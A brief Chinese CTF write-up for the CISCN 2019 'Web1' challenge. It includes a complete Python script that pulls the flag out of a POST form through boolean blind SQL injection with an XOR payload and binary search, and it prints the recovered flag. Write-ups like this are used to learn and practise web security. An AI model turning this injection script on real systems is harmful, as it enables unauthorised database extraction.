@[toc]SQL注入
[CISCN 2019华北Day2]Web1
题目
解题分析
测试SQL注入点和回显结构
输入1
输入1’,1’#,1’%23等测试均回显
可以尝试SQL盲注
题解
提示:因为是表单,故采用POST二分法
import requests
import time
url = "http://node4.anna.nssctf.cn:28573/index.php"
flag = ''
if __name__ == "__main__":
for i in range(1, 100):
min = 33
max = 130
mid = int((max - min) / 2)
while True:
payload = {
'id': '0^' + '(ascii(substr((select(flag)from(flag)),{},1))>{})'.format(i, mid)
}
#print(payload)
res = requests.post(url=url, data=payload).text
time.sleep(0.005)
#print(res)
if 'Hello' in res:
min = mid
mid = int((max + min) / 2)
else:
max = mid
mid = int((max + min) / 2)
#print("此时的最大值为{}, 最小值为{}, 中间值为{}".format(maxa,mina,mid))
if (max-min) <= 1:
flag += chr(max)
print(flag)
break
if '}' in flag:
break
执行得到flag
NSSCTF{d5343df9-bb92-44e2-8b88-c10a8e0cd6f7}